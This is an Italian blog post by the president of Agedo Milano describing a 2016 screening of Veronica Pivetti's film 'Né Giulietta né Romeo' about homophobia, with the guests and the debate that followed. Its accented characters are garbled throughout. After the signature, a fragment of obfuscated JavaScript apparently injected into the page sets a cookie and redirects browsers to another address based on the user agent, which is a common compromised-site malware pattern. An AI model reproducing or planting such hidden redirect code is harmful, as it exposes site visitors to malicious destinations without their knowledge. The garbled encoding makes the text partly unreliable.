post

Proiezione film “NA� Giulietta nA� Romeo”

Sabato 6 febbraio 2016, presso la Sala Alessi di Palazzo Marino, storica sede del Comune di Milano, come precedentemente annunciato e pubblicizzato, si A? svolta la proiezione del film a�?NA� Giulietta nA� Romeoa�?, il primo lavoro come regista della signora Veronica Pivetti, che la vede anche nel ruolo di co-sceneggiatrice insieme a Giovanna Gra e come attrice co-protagonista; patrocinato dalla sezione italiana di Amnesty International e dalla Regione Lazio e prodotto da Pigra, societA� della stessa Pivetti.

La tematica affrontata A? quanto mai attuale, infatti si parla di omosessualitA� ed omofobia nell’A�mbito delle relazioni sia familiari sia nella societA�; la signora Pivetti A? riuscita ad argomentare questa realtA� sdrammatizzando, facendo ridere e commuovere ed al contempo offrendo svariati punti di riflessione.

La serata A? stata patrocinata dal Comune di Milano, da Agedo, dalla Casa dei Diritti (istituzione del Comune Milano), dal Consolato in Italia degli Stati Uniti d’America e dal format Il Cinema e i Diritti.

Ospiti presenti in Sala la signora Pivetti e la co-sceneggiatrice Giovanna Gra, l’Assessore alle Politiche Sociali del Comune di Milano Pierfrancesco Majorino, il quale ha ringraziato tutti i presenti e gli organizzatori e ha descritto i risultati ottenuti fin ora dal suo Assessorato in fatto di eguaglianza di diritti.

L’evento ha riscosso un successo straordinario tanto che la Sala ha ben presto raggiunto la capienza massima. Il film ha avuto un ampio consenso da parte della platea che, alla fine della proiezione, ha partecipato al dibattito condotto da un bravissimo Lele Jandon, fondatore e conduttore de a�?Il Cinema e i Dirittia�?, a cui hanno partecipato Veronica Pivetti, Giovanna Gra e Rita De Santis, Presidente Onoraria di Agedo Nazionale.

Presenti nel Salone da��onore anche un folto gruppo di soci della��Agedo, compresa la Presidente di Milano, rappresentanti di altre associazioni lgbt, moltissimi giovani e famiglie. Il film, in considerazione del tema affrontato che, come ha detto la stessa regista a�?non A? stato ancora digeritoa�? nel nostro Paese, non ha riscosso moltissimi consensi presso le grandi case di produzione e le case di distribuzione. Ma la signora Pivetti, con grande caparbietA�, A? riuscita ad ottenere dei finanziamenti privati e grazie alla propria casa di produzione A? riuscita a realizzare questo meraviglioso progetto.

Il ringraziamento maggiore va a Lei e alla co-sceneggiatrice: insieme hanno progettato il film e lo stanno portando in giro per la��Italia; al Comune di Milano nella persona dell’Assessore Majorino che ha permesso questo evento; ai patrocinatori della serata; ai soci dell’Agedo, e soprattutto a Raffaello della Penna, storico attivista del movimento lgbt milanese che tanto si A? speso per la riuscita di questa meravigliosa serata.

Rita Mura
Presidente Agedo Milano

 

te()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}